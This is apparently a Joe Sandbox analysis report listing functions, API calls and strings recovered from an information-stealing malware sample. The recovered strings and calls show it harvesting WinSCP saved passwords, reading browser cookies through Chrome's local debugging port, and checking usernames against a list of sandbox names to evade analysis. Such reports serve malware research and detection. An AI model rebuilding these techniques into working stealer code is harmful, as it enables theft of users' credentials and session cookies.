Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: 9420be90e3af76621dfbfa23740dea40bbd3b54becb9f95f4807dd976f218747
Instruction ID: 88c097302cf76b96b5d8f2dcfa2c2b28b41eb72b6ed40f9c5e17f0048e4c989a
Opcode Fuzzy Hash: 9420be90e3af76621dfbfa23740dea40bbd3b54becb9f95f4807dd976f218747
Instruction Fuzzy Hash: A0D1827295012DABDF20EB90DC42AEAB778EF04305F5044E7AA08B6151DA717F89DF71

Function 00D59777 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 195memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5981D
PathFileExistsA.SHLWAPI(?), ref: 00D59828
Sleep.KERNEL32(000003E8), ref: 00D59837
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00D5989A
GetFileSize.KERNEL32(00000000,00000000), ref: 00D598B0
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D598C7
HeapAlloc.KERNEL32(00000000), ref: 00D598CE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00D598E7
CloseHandle.KERNEL32(00000000), ref: 00D598FF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00D5990B
HeapAlloc.KERNEL32(00000000), ref: 00D59912
lstrcatA.KERNEL32(00000000,?), ref: 00D59921
lstrcatA.KERNEL32(00000000,00D8833C), ref: 00D5992D
lstrcatA.KERNEL32(00000000,?), ref: 00D59937
lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00D59943
GetProcessHeap.KERNEL32(00000000,00D5AE7A), ref: 00D5997A
HeapFree.KERNEL32(00000000), ref: 00D59981
GetProcessHeap.KERNEL32(00000000,?), ref: 00D5998C
HeapFree.KERNEL32(00000000), ref: 00D59993
DeleteFileA.KERNEL32(?), ref: 00D5999C

Strings

_passwords.db, xrefs: 00D5993D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$Filelstrcat$Processlstrcpy$AllocFree$CloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
String ID: _passwords.db
API String ID: 4036908696-1485422284
Opcode ID: 2fefaf31e0aa732e12052354c290e98b1c943d50bd96d81bf31997c2624cb906
Instruction ID: 25eacb911f07dbc40aa4043ca8d71444ede2c9b652e766e39f6c4a4ba697dc7e
Opcode Fuzzy Hash: 2fefaf31e0aa732e12052354c290e98b1c943d50bd96d81bf31997c2624cb906
Instruction Fuzzy Hash: 7F613036940208BBCF50BFA4EC4AAAE7B78FF09701F140515FE41A3261DB355A5A9FB1

Function 00D76397 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00D7639F
__mtterm.LIBCMT ref: 00D763AB

Part of subcall function 00D7606A: DecodePointer.KERNEL32(FFFFFFFF), ref: 00D7607B
Part of subcall function 00D7606A: TlsFree.KERNEL32(FFFFFFFF), ref: 00D76095

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D763C1
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D763CE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D763DB
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D763E8
TlsAlloc.KERNEL32 ref: 00D76438
TlsSetValue.KERNEL32(00000000), ref: 00D76453
__init_pointers.LIBCMT ref: 00D7645D
EncodePointer.KERNEL32 ref: 00D7646E
EncodePointer.KERNEL32 ref: 00D7647B
EncodePointer.KERNEL32 ref: 00D76488
EncodePointer.KERNEL32 ref: 00D76495
DecodePointer.KERNEL32(Function_000261EE), ref: 00D764B6
__calloc_crt.LIBCMT ref: 00D764CB
DecodePointer.KERNEL32(00000000), ref: 00D764E5
__initptd.LIBCMT ref: 00D764F0
GetCurrentThreadId.KERNEL32 ref: 00D764F7

Strings

FlsGetValue, xrefs: 00D763C3
FlsSetValue, xrefs: 00D763D0
FlsFree, xrefs: 00D763DD
KERNEL32.DLL, xrefs: 00D7639A
FlsAlloc, xrefs: 00D763BB

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: cbaa88d6e2bf80909b60d0bed7e74ccd10d3de66e41396fdbd14c1dcdc9e6338
Instruction ID: fc52e9ba6dd9bc6182a7ffc9ee137462be71979fac45d3217ba8af244237f4fe
Opcode Fuzzy Hash: cbaa88d6e2bf80909b60d0bed7e74ccd10d3de66e41396fdbd14c1dcdc9e6338
Instruction Fuzzy Hash: 9F315C39810B12AAD715AB75BC09A163EE4EB45760B144627E428D33B4FB70C445FF70

Function 00D51917 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00D51A03
lstrcmpiA.KERNEL32(00D8BDEC,?), ref: 00D51A1E

Strings

WDAGUtilityAccount, xrefs: 00D519EF
timmy, xrefs: 00D5199F
Emily, xrefs: 00D5194F
HAPUBWS, xrefs: 00D51959
malware, xrefs: 00D519BD
sandbox, xrefs: 00D519B3
test user, xrefs: 00D519D1
milozs, xrefs: 00D5198B
Hong Lee, xrefs: 00D51963
user, xrefs: 00D519A9
CurrentUser, xrefs: 00D5193B
Miller, xrefs: 00D51981
IT-ADMIN, xrefs: 00D5196D
Sand box, xrefs: 00D51945
virus, xrefs: 00D519DB
John Doe, xrefs: 00D519E5
Peter Wilson, xrefs: 00D51995
maltest, xrefs: 00D519C7
Johnson, xrefs: 00D51977

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: 2514f8cff1663d6c7e453b18dfb11c49be9818faef554bb2d00e1e4a4054f721
Instruction ID: 5b64bee0394f754c9a4b201d6570d9935f7349b5e0dbceccec5f566578098ebd
Opcode Fuzzy Hash: 2514f8cff1663d6c7e453b18dfb11c49be9818faef554bb2d00e1e4a4054f721
Instruction Fuzzy Hash: 9721DFB59012689FCB22EF15DC487DDBBB4EB45719F4041DAA649AA310C7B04ECDCFA4

Function 00D5BB2E Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5BBD3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D5BCDD
HeapAlloc.KERNEL32(00000000), ref: 00D5BCE4
StrCmpCA.SHLWAPI(?,00D885A4,00000000), ref: 00D5BD95
StrCmpCA.SHLWAPI(?,00D885A8), ref: 00D5BDBD
lstrcatA.KERNEL32(00000000,?), ref: 00D5BDE1
lstrcatA.KERNEL32(00000000,00D885AC), ref: 00D5BDED
lstrcatA.KERNEL32(00000000,?), ref: 00D5BDF7
lstrcatA.KERNEL32(00000000,00D885B0), ref: 00D5BE03
lstrcatA.KERNEL32(00000000,?), ref: 00D5BE0D
lstrcatA.KERNEL32(00000000,00D885B4), ref: 00D5BE19
lstrcatA.KERNEL32(00000000,?), ref: 00D5BE23
lstrcatA.KERNEL32(00000000,00D885B8), ref: 00D5BE2F
lstrcatA.KERNEL32(00000000,?), ref: 00D5BE39
lstrcatA.KERNEL32(00000000,00D885BC), ref: 00D5BE45
lstrcatA.KERNEL32(00000000,?), ref: 00D5BE4F
lstrcatA.KERNEL32(00000000,00D885C0), ref: 00D5BE5B
lstrcatA.KERNEL32(00000000,?), ref: 00D5BE65
lstrcatA.KERNEL32(00000000,00D885C4), ref: 00D5BE71
lstrlenA.KERNEL32(00000000), ref: 00D5BEC3
lstrlenA.KERNEL32(?), ref: 00D5BEDE
DeleteFileA.KERNEL32(?), ref: 00D5BF21

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
String ID:
API String ID: 1139693110-0
Opcode ID: 4e0667557ed31b1967e80188ce218fbaaaee7072b1f9a92d9be6315aa629d545
Instruction ID: 42e779b32ed027083604c677a2c74a0bedb14d57082a2c7a36ebfb0f72423c69
Opcode Fuzzy Hash: 4e0667557ed31b1967e80188ce218fbaaaee7072b1f9a92d9be6315aa629d545
Instruction Fuzzy Hash: 3FC1B43294410DAFDF11ABA0ED469ED7B75FF09311F100026FA01B7162DB266E5AAFB0

Function 00D6D052 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,759183C0,00000000,00D6DD3D,?), ref: 00D6D057
StrCmpCA.SHLWAPI(759183C0,00D871AC), ref: 00D6D085
StrCmpCA.SHLWAPI(759183C0,.zip), ref: 00D6D095
StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 00D6D0A1
StrCmpCA.SHLWAPI(759183C0,.arc), ref: 00D6D0AD
StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 00D6D0B9
StrCmpCA.SHLWAPI(759183C0,.arj), ref: 00D6D0C5
StrCmpCA.SHLWAPI(759183C0,.gz), ref: 00D6D0D1
StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 00D6D0DD

Strings

.zoo, xrefs: 00D6D09B
.tgz, xrefs: 00D6D0D7
.zip, xrefs: 00D6D08F
.lzh, xrefs: 00D6D0B3
.arj, xrefs: 00D6D0BF
.gz, xrefs: 00D6D0CB
.arc, xrefs: 00D6D0A7

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 24fb5858110c1bbd702e384218d29d61fae86a80b8302f0d1968362557266cd0
Instruction ID: 13efbe698cfb197464b1e485ba4354a53a1f19f28ef11b24cc49ce4256a702c9
Opcode Fuzzy Hash: 24fb5858110c1bbd702e384218d29d61fae86a80b8302f0d1968362557266cd0
Instruction Fuzzy Hash: 02017120F897676B6F7226357C46E7F2E5E4B83F80F2C0925E800E6085EB44D84B56B5

Function 00D58B39 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 177stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D57E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00D57E3C

_memset.LIBCMT ref: 00D58C21
lstrcatA.KERNEL32(?,ws://localhost:9223,?,00000000,?), ref: 00D58C3B
lstrcatA.KERNEL32(?,00000000), ref: 00D58C5A

Part of subcall function 00D6045E: _memmove.LIBCMT ref: 00D60478

Strings

localhost, xrefs: 00D58BB4
.txt, xrefs: 00D58D6F
Cookies, xrefs: 00D58D13
ws://localhost:9223, xrefs: 00D58C2F
/devtools, xrefs: 00D58BDA

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$InternetOpen_memmove_memset
String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
API String ID: 216805803-4155744131
Opcode ID: 0a510d66593b170355c1ca1cd2a67300b517f23c933f0ec54dc3c8d3796d7690
Instruction ID: 18f15d97185bb4d4eda8e2e08c7a0ae8b39a282c694b48a60a05205551f27de3
Opcode Fuzzy Hash: 0a510d66593b170355c1ca1cd2a67300b517f23c933f0ec54dc3c8d3796d7690
Instruction Fuzzy Hash: 3E61DB71D406289FCF61EB64DC46BDBB7B8EF48702F4044D5AA09A7141EA70ABC99F70

Function 00D656FF Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00D69377), ref: 00D65714
ExitProcess.KERNEL32 ref: 00D6571F
strtok_s.MSVCRT ref: 00D65730

Strings

block, xrefs: 00D65708

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 5dc2399cdbff7b277a00ca2c5ce05fe2e446cedced360ee0d73c569ce6c48a68
Instruction ID: ae64980af4a22acd1695ee450434851d527ba26c410e595367e1cd3b8938f0b1
Opcode Fuzzy Hash: 5dc2399cdbff7b277a00ca2c5ce05fe2e446cedced360ee0d73c569ce6c48a68
Instruction Fuzzy Hash: 19411D70A84709BFCB406F72AC49A697BB8BB00749F644036E652E3954E730D694DFB0

Function 00D57E0E Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 00D57E3C
InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 00D57E6F
InternetCloseHandle.WININET(00000000), ref: 00D57E7C

Strings

WebSocketClient, xrefs: 00D57E31
http://localhost:9223/json, xrefs: 00D57E69
"ws://, xrefs: 00D57F4C
"webSocketDebuggerUrl":, xrefs: 00D57F21

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
API String ID: 3289985339-1054772028
Opcode ID: 81e1a56992073a6d7e3b7c99761699121a8dc55f08c3e6cbd54a982429deefe3
Instruction ID: 6deb087f991021e9d6207df51c2cd99acb833a37fe04af43ff8da3ed901b592f
Opcode Fuzzy Hash: 81e1a56992073a6d7e3b7c99761699121a8dc55f08c3e6cbd54a982429deefe3
Instruction Fuzzy Hash: EB414E71D04268AFDB21AB609C89EEA77BCEF08355F1400A5FA49E3140D7B09EC89F70

Function 00D67548 Relevance: 18.2, APIs: 12, Instructions: 194stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D67580
_memset.LIBCMT ref: 00D67591

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00D675BC
lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00D675DA
lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D675EE
